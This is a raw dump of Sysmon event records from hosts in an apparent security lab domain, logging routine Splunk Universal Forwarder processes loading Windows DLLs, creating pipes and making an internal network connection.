(rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344906Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344905Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344904Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344903Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057344902Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344900Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344899Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344898Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057344897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.453{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:10.452{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:10.452{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344892Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:10.452{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344891Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:10.452{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344890Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:10.452{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344889Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:10.452{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057344888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.268{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.268{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5FA233774C0DC1DBD5773114D8E2E5,SHA256=2AC749320C8DA0270FEBA676C494E98EC710572B4DC37C4162DD33735A9925ACfalsetrue 11241100x800000000000000057344886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.237{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.237{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45982E74E0F53345B1206ACD081C1432,SHA256=3524B7233957480E9C02B14C3F9AA20FB57DE22D9823365620C3A724B286840Dfalsetrue 534500x800000000000000057344884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.065{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057344883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.061{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057344882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.060{8B6011A9-5B09-618E-3BF3-04000000F101}92327372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.032{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.030{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 354300x800000000000000021219430Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:57.553{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64310-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x800000000000000021219429Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.867{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B0A-618E-06CE-08000000F101}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219428Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.867{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219427Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.867{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219426Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.867{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219425Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.867{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219424Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.867{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5B0A-618E-06CE-08000000F101}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219423Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.867{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B0A-618E-06CE-08000000F101}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219422Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.852{AD5E2759-5B0A-618E-06CE-08000000F101}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219421Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.508{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89A2B85DA756D5A57493E9298387D6B3,SHA256=38D42D1C51C7AE5A913A3E07F07599C78C50FF1746485E4CCE906817D1AEAAA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219420Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.367{AD5E2759-5B0A-618E-05CE-08000000F101}50803664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219419Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.179{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B0A-618E-05CE-08000000F101}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219418Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.179{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219417Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.179{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219416Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.179{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219415Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 